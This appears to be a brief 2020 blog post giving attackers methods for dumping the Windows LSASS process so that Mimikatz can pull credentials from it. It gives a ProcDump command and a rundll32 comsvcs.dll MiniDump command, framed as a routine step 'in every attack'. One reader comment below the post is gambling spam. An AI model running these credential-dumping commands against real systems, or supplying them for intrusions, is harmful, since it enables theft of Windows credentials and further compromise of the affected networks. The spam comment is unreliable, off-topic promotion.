Monday, 13 April 2020

LSASS Dumping Methods ( For Mimikatz )

In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.

Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"

Using VB Script :

Download script from here :

rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.

1 comment:

  1. thanks for this informission this meant to me a lot we also provide the fastest satta king disawar Result thier is site witch is giving the morning Gali Result before anyone and following is the bestest site i ever seen in the world for all time instant satta king Result